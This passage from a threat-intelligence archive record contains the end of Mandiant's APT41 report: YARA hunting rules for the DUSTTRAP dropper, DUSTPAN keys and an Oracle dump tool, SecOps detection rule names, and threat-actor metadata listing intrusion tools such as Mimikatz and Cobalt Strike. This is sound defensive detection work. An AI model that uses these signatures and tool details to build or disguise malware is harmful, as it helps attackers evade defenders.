username/password@tnsname\" ascii\r\n $import = \"OCI.dll\" ascii\r\n condition:\r\n (((uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and\r\n pe.imports(\"OCI.dll\",\"OCIServerAttach\") and\r\n pe.imports(\"OCI.dll\",\"OCISessionBegin\") and\r\n $import and $win_name and\r\n for all of ($p*) : ( @ \u003e @heading )) or\r\n ((uint32(0) == 0x464c457f) and\r\n $elf_name and\r\n for any i in (0 .. elf.symtab_entries):\r\n(elf.symtab[i].name == \"OCIServerAttach\") and\r\n for any i in (0 .. elf.symtab_entries):\r\n(elf.symtab[i].name == \"OCISessionBegin\"))) and\r\n $out and $heading and (5 of ($p*))\r\n}\r\nrule M_Hunting_Dropper_DUSTTRAP_1\r\n{\r\nmeta:\r\nauthor = \"Mandiant\"\r\ndescription = \"Detects the DUSTTRAP dropper (x64) based\r\non the use of CFG patching constants and argument construction\r\nfor payload entry-point\"\r\ndisclaimer = \"This rule is meant for hunting and is not\r\ntested to run in a production environment.\"\r\nstrings:\r\n$cfg_patch_constant_1 = { 48 FF E0 CC 90 }\r\n$cfg_patch_constant_2 = { 8B DA 48 8B F9 E8 }\r\n$cfg_patch_constant_3 = { B8 48 8B 00 00 66 39 02 }\r\n$cfg_patch_constant_4 = { 81 7A 07 48 8B D1 48 }\r\n$log_format = \"%lld.log\" wide\r\ncondition:\r\nuint16(0) == 0x5a4d and\r\nall of ($cfg_patch_constant_*) and\r\n$log_format\r\n}\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 20 of 22\n\nimport \"pe\"\r\nrule M_Hunting_DUSTPAN_CryptKeys {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Attempts to detect executables containing known\r\nDUSTPAN encryption keys within the .data section\"\r\n disclaimer = \"This rule is meant for hunting and is not\r\ntested to run in a production environment.\"\r\n strings:\r\n $key_1 = {3BCF741BF6411C087415BA340000004C8D05F28\r\nC0000488B4910E801F0FEFFB8}\r\n $key_2 = {C4498BD6488BCFE848A5000084C07564488BCFE\r\n8585C0000498B0F4C8B497045}\r\n $key_3 = {A24299055F1F0C14CBDD0B01DFA64C34F5FD033\r\nCA7F1AF30A0C75C57359D41E0}\r\n condition:\r\n filesize \u003c 15MB and\r\n for any i in (0..pe.number_of_sections - 1): (\r\n pe.sections[i].name == \".data\" and\r\n any of ($key_*) in (pe.sections[i].raw_data_offset..\r\npe.sections[i].raw_data_offset + pe.sections[i].raw_data_size)\r\n )\r\n}\r\nimport \"pe\"\r\n \r\nrule M_HUNTING_DUSTTRAP_PayloadFile {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects executables containing a .lrsrc section\r\nwhich may represent DUSTTRAP payloads\"\r\n disclaimer = \"This rule is meant for hunting and is not\r\ntested to run in a production environment.\"\r\n condition:\r\n for any i in (0..pe.number_of_sections - 1): (\r\n uint32(pe.sections[i].raw_data_offset + 0) == 0x100 and\r\n pe.sections[i].raw_data_size \u003e uint32\r\n(pe.sections[i].raw_data_offset + 0) and\r\n pe.sections[i].name == \".lrsrc\" and\r\n uint32(pe.sections[i].raw_data_offset + 4) \u003c 0x1000 and\r\n uint32(pe.sections[i].raw_data_offset + 8) \u003c 4\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 21 of 22\n\n)\r\n}\r\nYARA-L\r\nIf you are a Google SecOps Enterprise+ customer, rules were released to your Emerging Threats rule pack, and\r\nIOCs listed in this blog post are available for prioritization with Applied Threat Intelligence.  \r\nRelevant Rules\r\nWinRAR Command Line CSV to RAR\r\nSQLULDR2 Process Launch\r\nDUSTTRAP Process Execution and Command and Control\r\nDUSTTRAP Dropping Multiple Utilities\r\nDUSTTRAP Spawning Actions on Objectives Processes\r\nSuspected DUSTTRAP Command and Control via Google API\r\nSuspected Stolen Code Signing Certificate (CCR Inc)\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 22 of 22", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE", "ETDA" ], "references": [ "https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust" ], "report_names": [ "apt41-arisen-from-dust" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434714, "ts_updated_at": 1775791941, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0c90777c8e5814d8e624e737c865f4dd4e45372d.pdf", "text": "https://archive.orkl.eu/0c90777c8e5814d8e624e737c865f4dd4e45372d.txt", "img": "https://archive.orkl.eu/0c90777c8e5814d8e624e737c865f4dd4e45372d.jpg" } }